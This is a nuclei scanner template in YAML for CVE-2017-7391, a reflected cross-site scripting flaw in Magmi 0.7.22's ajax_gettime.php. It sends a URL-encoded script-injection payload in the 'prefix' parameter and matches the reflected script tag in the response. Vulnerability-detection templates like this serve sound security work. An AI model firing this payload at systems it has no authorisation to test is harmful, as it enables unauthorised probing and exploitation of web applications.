nuclei-templates/cves/2017/CVE-2017-7391.yaml

39 lines
1.1 KiB
YAML

id: CVE-2017-7391
info:
name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
reference:
- https://github.com/dweeves/magmi-git/issues/522
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
- https://github.com/dweeves/magmi-git/pull/525
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-7391
cwe-id: CWE-79
tags: cve,cve2017,magmi,xss
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words:
- "text/html"